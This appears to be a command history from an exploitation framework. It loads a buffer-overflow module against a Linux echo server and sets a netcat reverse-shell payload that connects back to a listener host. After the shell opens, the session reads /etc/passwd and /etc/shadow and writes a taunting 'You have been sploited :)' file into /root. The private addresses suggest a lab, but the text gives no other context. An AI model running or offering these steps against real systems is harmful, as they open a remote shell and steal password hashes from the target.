load linux_x64_ovrflwmyechosrv
set payload reverse/linux_netcat
set rhost 192.168.1.76
set rport 1025
set lhost 192.168.1.84
set lport 4444
run
ls
load linux_x64_ovrflwmyechosrv
run payload reverse/linux_netcat rhost 192.168.1.76 rport 1025 lhost 192.168.1.84 lport 4444
cat /etc/passwd
cat /etc/shadow
touch /root/sploited.txt
gnome-terminal -- tail -f -n 1 /root/sploited.txt
echo "You have been sploited :)" >> /root/sploited.txt
load linux_x64_ovrflwmyechosrv
show help
help pwn
load linux_x64_ovrflwmyechosrv
help pwn
pwn
